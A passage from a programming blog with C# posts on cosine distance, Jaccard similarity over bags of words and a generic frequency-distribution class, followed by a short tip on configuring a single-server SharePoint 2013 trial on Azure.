double cos = dotProduct / (Math.Sqrt(l2norm1) * Math.Sqrt(l2norm2));
// Math.Acos returns the angle in radians; convert it to degrees
return Math.Acos(cos) * 180.0 / Math.PI;
}
}
Here are some methods that show how to use this class:
double tol = 0.00001;
[TestMethod]
public void CosineSimple()
{
List<int> l1 = new List<int>();
List<int> l2 = new List<int>();
l1.Add(1);
l1.Add(1);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(2);
l2.Add(2);
l2.Add(2);
l2.Add(2);
double dist = Cosine.Distance(l1, l2);
Console.WriteLine(dist);
Assert.AreEqual(40.3645365730974, dist, tol);
}
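Working through the same frequency vectors (2, 7) and (6, 4): the dot product is 2·6 + 7·4 = 40, the vector lengths are √(2² + 7²) = √53 and √(6² + 4²) = √52, so cos θ = 40 / (√53 · √52) ≈ 0.762 and θ = arccos(0.762) ≈ 40.36°, which is the value asserted in the test.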
Reference: [1] “Mining of Massive Datasets” by A.Rajaraman, J. Leskovec, J.D. Ullman, Cambridge University Press. 2011. P.90. See http://infolab.stanford.edu/~ullman/mmds.html
Written by Nick Grattan
June 10, 2014 at 7:45 am
Bag of Words and Frequency Distributions in C#
The simplest way of representing a document is the “Bag of Words”. This is the list of unique words used in a document. It is therefore a simple present/not present indicator for all words in the vocabulary and does not take into account the occurrence frequency of these words nor the order of the words.
The Bag of Words is used by the Jaccard Similarity measure for document similarity. If two documents have the same set of words then they are deemed identical, and if they have no common words they are completely different. This similarity measure takes no account of the relative length of the two documents being compared.
[Figure: Bag of Words similarity]
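Formally, for two bags of words A and B the Jaccard similarity is the size of their intersection divided by the size of their union, J(A, B) = |A ∩ B| / |A ∪ B|; the corresponding Jaccard distance is 1 − J(A, B).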
In C# a Bag of Words can be represented by a generic List<>. The list type can either be a string (in which case it’s the actual word) or an integer (where the integer is a lookup into a dictionary). The latter is more efficient because the word is stored just once as a string and the integer lookup (4 bytes) is most likely to be shorter than the word itself. The C# in this blog post creates a dictionary and some Bags of Words, and calculates the Jaccard index for documents.
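As a minimal illustrative sketch (not the code from the linked post; the class and method names here are made up for this example), the Jaccard index for two bags of words can be computed with set operations:
using System;
using System.Collections.Generic;
using System.Linq;
public static class Jaccard
{
/// <summary>
/// Jaccard similarity between two bags of words: |intersection| / |union|.
/// Returns 1.0 for identical word sets, 0.0 for no words in common.
/// </summary>
public static double Similarity<T>(List<T> l1, List<T> l2)
{
// A Bag of Words ignores frequency, so reduce each list to its distinct items.
var s1 = new HashSet<T>(l1);
var s2 = new HashSet<T>(l2);
if (s1.Count == 0 && s2.Count == 0)
return 1.0; // treat two empty documents as identical
int intersection = s1.Intersect(s2).Count();
int union = s1.Union(s2).Count();
return (double)intersection / union;
}
}
For example, Jaccard.Similarity(new List<string> { "cat", "dog" }, new List<string> { "cat", "rat" }) returns 1/3, since one word is shared out of three distinct words.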
Frequency Distributions record not only the words in a document but also the frequency with which they occur. However, like Bags of Words, no account is taken of the order of words in the document. These frequency distributions can be compared and used to assess the similarity between two or more documents.
[Figure: frequency distributions for two documents]
These techniques generally calculate the distance between two documents. A distance measure is the inverse of similarity. Common techniques are Euclidean, Manhattan and Cosine distances.
The following C# class manages Frequency Distributions. It’s a generic class, and so can use strings (the words themselves) or integers (for lookups into a dictionary).
using System;
using System.Collections.Generic;
using System.Linq;

/// <summary>
/// Manages Frequency Distributions for items of type T
/// </summary>
/// <typeparam name="T">Type for item</typeparam>
public class FrequencyDist<T>
{
/// <summary>
/// Construct Frequency Distribution for the given list of items
/// </summary>
/// <param name="li">List of items to calculate for</param>
public FrequencyDist(List<T> li)
{
CalcFreqDist(li);
}
/// <summary>
/// Construct Frequency Distribution for the given list of items, across all keys in itemValues
/// </summary>
/// <param name="li">List of items to calculate for</param>
/// <param name="itemValues">Entire list of itemValues to include in the frequency distribution</param>
public FrequencyDist(List<T> li, List<T> itemValues)
{
CalcFreqDist(li);
// add items to frequency distribution that are in itemValues but missing from the frequency distribution
foreach (var v in itemValues)
{
if(!ItemFreq.Keys.Contains(v))
{
ItemFreq.Add(v, new Item { value = v, count = 0 });
}
}
// check that all values in li are in the itemValues list
foreach(var v in li)
{
if (!itemValues.Contains(v))
throw new Exception(string.Format("FrequencyDist: Value in list for frequency distribution not in supplied list of values: '{0}'.", v));
}
}
/// <summary>
/// Calculate the frequency distribution for the values in list
/// </summary>
/// <param name="li">List of items to calculate for</param>
void CalcFreqDist(List<T> li)
{
itemFreq = new SortedList<T,Item>((from item in li
group item by item into theGroup
select new Item { value = theGroup.FirstOrDefault(), count = theGroup.Count() }).ToDictionary(q => q.value, q => q));
}
SortedList<T, Item> itemFreq = new SortedList<T, Item>();
/// <summary>
/// Getter for the Item Frequency list
/// </summary>
public SortedList<T, Item> ItemFreq { get { return itemFreq; } }
public int Freq(T value)
{
if(itemFreq.Keys.Contains(value))
{
return itemFreq[value].count;
}
else
{
return 0;
}
}
/// <summary>
/// Returns the list of distinct values between two lists
/// </summary>
/// <param name="l1"></param>
/// <param name="l2"></param>
/// <returns></returns>
public static List<T> GetDistinctValues(List<T> l1, List<T> l2)
{
return l1.Concat(l2).ToList().Distinct().ToList();
}
/// <summary>
/// Manages a count of items (int, string etc) for frequency counts
/// </summary>
/// <typeparam name="T">The type for item</typeparam>
public class Item
{
/// <summary>
/// The value of the item, e.g. int or string
/// </summary>
public T value { get; set; }
/// <summary>
/// The count of the item
/// </summary>
public int count { get; set; }
}
}
The following code shows how this class can be used:
List<string> li = new List<string>();
li.Add("One");
li.Add("Two");
li.Add("Two");
li.Add("Three");
li.Add("Three");
li.Add("Three");
FrequencyDist<string> cs = new FrequencyDist<string>(li);
foreach (var v in cs.ItemFreq.Values)
{
Console.WriteLine(v.value + " : " + v.count);
}
The output from executing this code is:
One : 1
Three : 3
Two : 2
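The two-argument constructor is what aligns two distributions over the same set of items, as the distance calculations above require. A short sketch using the class as defined here (the document contents are made up):
List<string> doc1 = new List<string> { "Cat", "Cat", "Dog" };
List<string> doc2 = new List<string> { "Dog", "Rat" };
// Build the combined vocabulary, then align both distributions to it.
List<string> vocab = FrequencyDist<string>.GetDistinctValues(doc1, doc2);
FrequencyDist<string> fd1 = new FrequencyDist<string>(doc1, vocab);
FrequencyDist<string> fd2 = new FrequencyDist<string>(doc2, vocab);
// Words missing from a document appear with a count of zero.
Console.WriteLine(fd1.Freq("Rat")); // 0
Console.WriteLine(fd2.Freq("Dog")); // 1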
Written by Nick Grattan
June 9, 2014 at 6:51 pm
Creating single server SharePoint 2013 trial for Windows Azure
Creating virtual machines with Azure is a great way of standing up test servers, especially for SharePoint where the installation can be long.
You can create a SharePoint Server 2013 trial server from Azure by first selecting “From Gallery”:
[Screenshot: selecting “From Gallery” when creating a virtual machine in the Azure portal]
And then select the “SharePoint Server 2013 Trial”
[Screenshot: selecting the “SharePoint Server 2013 Trial” image from the gallery]
The problem with this is that SharePoint is pre-installed for a farm installation and therefore cannot be set up as a standalone server. As the description provided by Microsoft states, you will need to create another virtual machine for SQL Server and possibly another for a domain controller with Active Directory.
To circumvent this issue you can:
1. Create the VM using the gallery in Azure as shown above
2. Install SQL Server Express 2012 on the newly created VM
3. Create a new farm using the New-SPConfigurationDatabase PowerShell command
4. Run the SharePoint Products Configuration Wizard and join the farm you’ve just created.
The last three steps are described in this excellent blog article: http://blogs.msdn.com/b/suhasaraos/archive/2013/04/06/installing-sharepoint-2013-on-a-single-server-without-a-domain-controller-and-using-sql-server-express.aspx
Written by Nick Grattan
April 22, 2014 at 1:00 am